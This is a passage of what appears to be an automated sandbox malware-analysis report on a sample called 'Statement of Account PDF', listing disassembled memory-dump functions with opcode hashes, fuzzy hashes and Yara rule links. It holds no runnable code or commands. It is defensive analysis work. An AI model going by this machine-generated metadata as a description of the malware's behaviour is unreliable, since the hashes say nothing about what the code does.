                                                        • Instruction Fuzzy Hash: E1E086313940105B9758665E98D48BEB7DEEBC9620755847AF20DD7326CD21DC0553A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE5058 Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba8d4c89ffff666c00d760dd55d38834d39f506761679291311c6270a0b92011
                                                        • Instruction ID: 0fc83b60dd1cc62c44dd73074792ec4997def2f630900e8efb5d620cb20cd4d1
                                                        • Opcode Fuzzy Hash: ba8d4c89ffff666c00d760dd55d38834d39f506761679291311c6270a0b92011
                                                        • Instruction Fuzzy Hash: 7AE0207B009744BFCB1347859C54CD5BFA9FF0E224309C087F24947533D1529510E791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE4F0 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71e1280e14c3a7c3a2570ba688e7a3495ef4d44bbae73c15a4d2d828b18d8849
                                                        • Instruction ID: 27524f73337df2d7d92d83f44a42510d1e6732f76ca3a8a29587db282cce1b36
                                                        • Opcode Fuzzy Hash: 71e1280e14c3a7c3a2570ba688e7a3495ef4d44bbae73c15a4d2d828b18d8849
                                                        • Instruction Fuzzy Hash: C2E0DF32B487810FD302AA28F8510CAF7E2EEC12903049A7AD0818B32BDA24AC874785
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEE997 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 149b2f84428775f69694bc4be3bd06337c859cd3d2c1d28b7f5fdfc9e5e53b64
                                                        • Instruction ID: a837fd3d70bc8e95a11a1320d2c5a41ca371d19204df7c21443bc9e5c2df5989
                                                        • Opcode Fuzzy Hash: 149b2f84428775f69694bc4be3bd06337c859cd3d2c1d28b7f5fdfc9e5e53b64
                                                        • Instruction Fuzzy Hash: 57E01234E09715CFDB94CF56D9905EDB7BAAB8C281F00AD69C00AA7269CB305E48CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4AEC Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 88a3ee34f1b6aedff11c4c345bd7f946cfc209b9d5c1efaeac07e7767abca2be
                                                        • Instruction ID: 8fde441e10d5c792b99f51d7a1de95271705c51a228c8ecc437a947db05584a9
                                                        • Opcode Fuzzy Hash: 88a3ee34f1b6aedff11c4c345bd7f946cfc209b9d5c1efaeac07e7767abca2be
                                                        • Instruction Fuzzy Hash: B0E04F352440008BCB11EB6DC489BE973E9EB4E358F5955B3F559EB325C276B8818B40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EECAC6 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64146225a07d6c9c1edbb975e88f5cfa5db59257ddd68adcd4bc125261f2bb3e
                                                        • Instruction ID: eeba19293f09fdf0c8c4d105a4caadd133c415e96ae72e99e290651b24fec618
                                                        • Opcode Fuzzy Hash: 64146225a07d6c9c1edbb975e88f5cfa5db59257ddd68adcd4bc125261f2bb3e
                                                        • Instruction Fuzzy Hash: B5E09272A4024DDBCB109F92E6087FDBBB0FB8420AF301022E09AB2940C7711980EA90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A6688 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dee5a8e4f005cfe9312b6bac17ebc72fae502bdfaa7395bee12fbec09c622b1c
                                                        • Instruction ID: 0b049283cc0c09b1ad66479d1b28885c002c780f29800f0ba3cf6954ce8e90d8
                                                        • Opcode Fuzzy Hash: dee5a8e4f005cfe9312b6bac17ebc72fae502bdfaa7395bee12fbec09c622b1c
                                                        • Instruction Fuzzy Hash: F5F0C9B4905208FFCF44DF99D840AADBBB5EB58310F14C1AAED1857350D6329A61DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4938 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ee6c9c37433fea6109f0c755d635d16a4d5375d6fbd3610d4c7c802db45285f
                                                        • Instruction ID: dfef6629bd0d6ba77a4194126c4a8f3f8d44f2d789992fd6745edd851c32627d
                                                        • Opcode Fuzzy Hash: 8ee6c9c37433fea6109f0c755d635d16a4d5375d6fbd3610d4c7c802db45285f
                                                        • Instruction Fuzzy Hash: B6E08C36285214AF8B029B8A9844CA6BF99EB09260708C452F20A47132C652E910EB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEEB84 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5687620d5fc4f11b51403264980e212decae71f31ca1d01778fbdd9013c13d62
                                                        • Instruction ID: 8dc1edae82a17792de286bd3e7e3e411fff2e4182dbe37d0ed2291e6e9c46b24
                                                        • Opcode Fuzzy Hash: 5687620d5fc4f11b51403264980e212decae71f31ca1d01778fbdd9013c13d62
                                                        • Instruction Fuzzy Hash: D4E09230E0A719CFDB90CF95C994AACBB7AAF4C241F0049E9D00A9726DCB304E48CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEBB30 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 94614a3ba3976b8bddeadd068796eef55b927702ef939b96f6a91db629566044
                                                        • Instruction ID: 1a7643b32ba78b253a9075377bad38442e4e0c0a87c8a534d098c838dc2a0fee
                                                        • Opcode Fuzzy Hash: 94614a3ba3976b8bddeadd068796eef55b927702ef939b96f6a91db629566044
                                                        • Instruction Fuzzy Hash: 5CE0E574E05208EFCB84DFA9D5816ACFBF5EB48300F10C1A9982893340D631AE01CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE929 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635da228d97735b1bf5e3c37f0037a338ae83862e80178e4d762e03f5fa6c57
                                                        • Instruction ID: c3bf8a8f2f07bb1c17b822c759df6af1f073dcf8daac916c1dadbb58f42fa0ac
                                                        • Opcode Fuzzy Hash: a635da228d97735b1bf5e3c37f0037a338ae83862e80178e4d762e03f5fa6c57
                                                        • Instruction Fuzzy Hash: 83E0C2E2B4C2C10FDB1AE27568889D83FC29BBB16870890E9C2408A147E45E54C7C352
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEA3A7 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01d09c71e1e8700e2a489d761416735179ae67fad9cd5c48264632070717ca9f
                                                        • Instruction ID: 9ea5d72ebab511a3d0d264662acbb3b1fe8cdbb6cb2045488d865a79cd1ac877
                                                        • Opcode Fuzzy Hash: 01d09c71e1e8700e2a489d761416735179ae67fad9cd5c48264632070717ca9f
                                                        • Instruction Fuzzy Hash: DBE0C270946108EFCB80DFF5D904ADE7BFEEB09300F00A4A5A10693110EE318E00DFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEF948 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07edfbd560fdd9544eba45ffc92a09aad56469e9f5c83f28ff7254d27dabef3f
                                                        • Instruction ID: d89eb67e6dfb692be55599077a1f157824b29a0acd3a78eca04f19e329915049
                                                        • Opcode Fuzzy Hash: 07edfbd560fdd9544eba45ffc92a09aad56469e9f5c83f28ff7254d27dabef3f
                                                        • Instruction Fuzzy Hash: 8DD05B31744114979604365FB01859F769FDBC4672B040026E50BC3354CD994C4247E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEA3A8 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ebe16e658df4579d80bdd2080420b7ba9a86c1874492d650a78a0cbff063004
                                                        • Instruction ID: 08f803bfb7c9a536d1eb2b7776b081904c6540d53e79da4baa64eb3de29ebc1f
                                                        • Opcode Fuzzy Hash: 9ebe16e658df4579d80bdd2080420b7ba9a86c1874492d650a78a0cbff063004
                                                        • Instruction Fuzzy Hash: ADE0C270946108EFCB80DFE5D50469E7BFEEB09300F00A4A5910693110EA318E00DFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEBAE8 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3ba6e818d150a538554c0ab0ef2a7a01ae9ab910c228a6ea968906ee00e6d9b
                                                        • Instruction ID: 3af76e528ce007aea3803ba12b6eafd79edf2f6b03ab01d4d9436eb3c60d542d
                                                        • Opcode Fuzzy Hash: e3ba6e818d150a538554c0ab0ef2a7a01ae9ab910c228a6ea968906ee00e6d9b
                                                        • Instruction Fuzzy Hash: 80E08CB0946108EACB80EFA99500AAA77BDDB0A200F0054A5900583110E9325E009B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEB83F Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9462fb8c583567f73eeae16f5bcccdd25f58a03fcc141d8c7550b4501e081071
                                                        • Instruction ID: 81ef8875f9742b28f182202798f67c02d4358c3ae4e4d3bf6bf2b79f5ed3765c
                                                        • Opcode Fuzzy Hash: 9462fb8c583567f73eeae16f5bcccdd25f58a03fcc141d8c7550b4501e081071
                                                        • Instruction Fuzzy Hash: FBE08C34D0A108EBCB54DBA4EA419ADBBB8EB45304F10D1ADD81823340CA326E42DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4D40 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1fb91d91f3f904882fcb7a9c2dfc5d7e1d9c606f182fa55c29570dc9e05b4e04
                                                        • Instruction ID: 8a5e79a75a148fe10b91737404b293ea39b17ab257dbbfdf1cedf978775213ab
                                                        • Opcode Fuzzy Hash: 1fb91d91f3f904882fcb7a9c2dfc5d7e1d9c606f182fa55c29570dc9e05b4e04
                                                        • Instruction Fuzzy Hash: AEE0E6B4A04208EFCB00FFA4E54185DBBB5FB853047108655E80597318DB326F04DB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2F01 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a6cb31027e83b35191af11cf43ea2fcf96d367f1292e1bc4ecee191b2db8e0c
                                                        • Instruction ID: ce0013f5622591f4bd08e448043273177773fac033fea801a052c49a67cd5911
                                                        • Opcode Fuzzy Hash: 8a6cb31027e83b35191af11cf43ea2fcf96d367f1292e1bc4ecee191b2db8e0c
                                                        • Instruction Fuzzy Hash: 5EE04F7040A2408FC7558F2498195503F34DB02215B2A42DAE8548F2B3D239CA57CBD2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9F10 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fc8dec30cd997f912a647b27396318f1d90162e585ec4eb6b088241d7927bfb
                                                        • Instruction ID: d2f23aaa2ff3ac42e46cbe93971b6e028532749ba3ecc037201eb1acdb072631
                                                        • Opcode Fuzzy Hash: 2fc8dec30cd997f912a647b27396318f1d90162e585ec4eb6b088241d7927bfb
                                                        • Instruction Fuzzy Hash: AED01276605148CFD710AFE5E404ADDB779EB89312F0090A6E20ADB504CB3599158F60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE1418 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 69ffb05af9b253eba234417b3c8625d5ec74c65496b21876af285a2ab41e5291
                                                        • Instruction ID: 6a27b7fc5a84d4405ba3ece710ede155025b99a951860ae5d6a6acd3946a8f49
                                                        • Opcode Fuzzy Hash: 69ffb05af9b253eba234417b3c8625d5ec74c65496b21876af285a2ab41e5291
                                                        • Instruction Fuzzy Hash: 6CD0A9322400147BCA01339A5C009BABA2DFB85B58B58A099F3089E156D593EC038385
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEE818 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fd37df4fd4cf3aefb8622378768b0f27672363a08f3eec4179de058e7971bc1
                                                        • Instruction ID: 13542890df4d0201d5c4459a4e0c6a52ef81e69c95941eb8e6ee97082e5e298f
                                                        • Opcode Fuzzy Hash: 2fd37df4fd4cf3aefb8622378768b0f27672363a08f3eec4179de058e7971bc1
                                                        • Instruction Fuzzy Hash: 70D05E300453808FC3426BB8A41A3A53BB89F06222F064496E4C8C6471DF780D95CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE0C0 Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e7c721a99f3ad2206bbb736198ac74b70d0867df894bd4183cb3ec4910bb2a1
                                                        • Instruction ID: cc32d16db0062b260590286ed699664ed3d3677ebd0dc804c0938e63f6f6b0e5
                                                        • Opcode Fuzzy Hash: 9e7c721a99f3ad2206bbb736198ac74b70d0867df894bd4183cb3ec4910bb2a1
                                                        • Instruction Fuzzy Hash: 26D0C9363501289F8704AB58E404CA97BAEEB9D6613014067FD05C7331DA72DC51CBD4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE180 Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4e0896747cf8500099fdcb4a87dc9fc241536a2c7061ec120819094f09df735
                                                        • Instruction ID: b6adf761c5afb35855b97af64acd9259c1fa66160c3ebc636ff70a3e80d33696
                                                        • Opcode Fuzzy Hash: f4e0896747cf8500099fdcb4a87dc9fc241536a2c7061ec120819094f09df735
                                                        • Instruction Fuzzy Hash: 91D01231310138D7DB192A5AA8187BF77DCEBC4795F444169E509D6280CB79ADC0C7D5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEABD0 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8acd6542addf648b0205099ca2f037d85b22198151620942ee6c803c4645ff9b
                                                        • Instruction ID: 81b25aa163b6255945945f4020e322c5a1ffff3a3b4678455be36af669cf0eb5
                                                        • Opcode Fuzzy Hash: 8acd6542addf648b0205099ca2f037d85b22198151620942ee6c803c4645ff9b
                                                        • Instruction Fuzzy Hash: 98E0E278A40109CFC700DF69E499AADBBB1FB0C310F259429E502A7260CB346884CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A6ED8 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a99bb343aeac580e8eeccf1752d7b3184b4a28b4b4710483bdce31ce5d2ae460
                                                        • Instruction ID: 90ad409aa854ea71ac03f8489a08a75f1e3cdce38b567810b2c9606e51c6b425
                                                        • Opcode Fuzzy Hash: a99bb343aeac580e8eeccf1752d7b3184b4a28b4b4710483bdce31ce5d2ae460
                                                        • Instruction Fuzzy Hash: BEC080B0501208ABC344EFF9E40875B77ADDF05221F005055F50AC3140DF72A540C666
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9F74 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc87782bc4c6e34c1f54a3d455182100e461559dc670eaaadaa00494fd55fcd4
                                                        • Instruction ID: 67a37a389bd7b74e9975cd3660a6d9ec2af676946be143c7f9491d5d1a7a8d5f
                                                        • Opcode Fuzzy Hash: dc87782bc4c6e34c1f54a3d455182100e461559dc670eaaadaa00494fd55fcd4
                                                        • Instruction Fuzzy Hash: A4E01778E0421ACFCB60DF68D840BADBBB2FB48300F1014A8D41AA7746E7306E81CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EED388 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 102760eed34fbfb923646dc5aca0699261429daab08c9728f65bddd9e95fd850
                                                        • Instruction ID: 7e917c8ad0603a7377a3bad8c9c0d908e5f952cc36ba38ddedaf9edb3b86d8f0
                                                        • Opcode Fuzzy Hash: 102760eed34fbfb923646dc5aca0699261429daab08c9728f65bddd9e95fd850
                                                        • Instruction Fuzzy Hash: 52B09B2231423513D618319D64105BD738D47C9569F500067950D97751CCC59C4103DF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEA105 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8feaae62c2e221f59643fa2d0dd23c399b399a67d81f8694433894967a83aad2
                                                        • Instruction ID: d42ce03cf3b570ecf51801ad6c7a501b17d236adfe1a7b935fb283efd9ce0541
                                                        • Opcode Fuzzy Hash: 8feaae62c2e221f59643fa2d0dd23c399b399a67d81f8694433894967a83aad2
                                                        • Instruction Fuzzy Hash: D7E04278905259CFEB94CF64DD44B9DB7B2FB48300F109195D90EAB385DA715984CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9E33 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 530fb005edd1945a335c39b2059cec46709acec13b921d9368d45b3444f4eb45
                                                        • Instruction ID: 5eda3195e22c7db7110240014249fba157abd4cd65649bd8e42161edb5d0feaf
                                                        • Opcode Fuzzy Hash: 530fb005edd1945a335c39b2059cec46709acec13b921d9368d45b3444f4eb45
                                                        • Instruction Fuzzy Hash: FDD09234908288CFCB80DF91D8986ACBBB5FB49301F10A4A6950FB6245CA361D84CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEE828 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8b7a2ef148052de94dc6fc36d38b23c2c0a6819460b0d7b06b7c4f1442faf86
                                                        • Instruction ID: 7799aed04ae0da2f70235657ee5f13deb31193db65b7c92e14b1d852dc531c79
                                                        • Opcode Fuzzy Hash: e8b7a2ef148052de94dc6fc36d38b23c2c0a6819460b0d7b06b7c4f1442faf86
                                                        • Instruction Fuzzy Hash: 97C02B300402048BC2506BECF80D3B93B7CD704323F001015F10C814608F741880CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AE41C Relevance: .0, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e7af69d7576065d79f7fb7c321566d01144edff6bfeb6dd78dc1897cbd31232
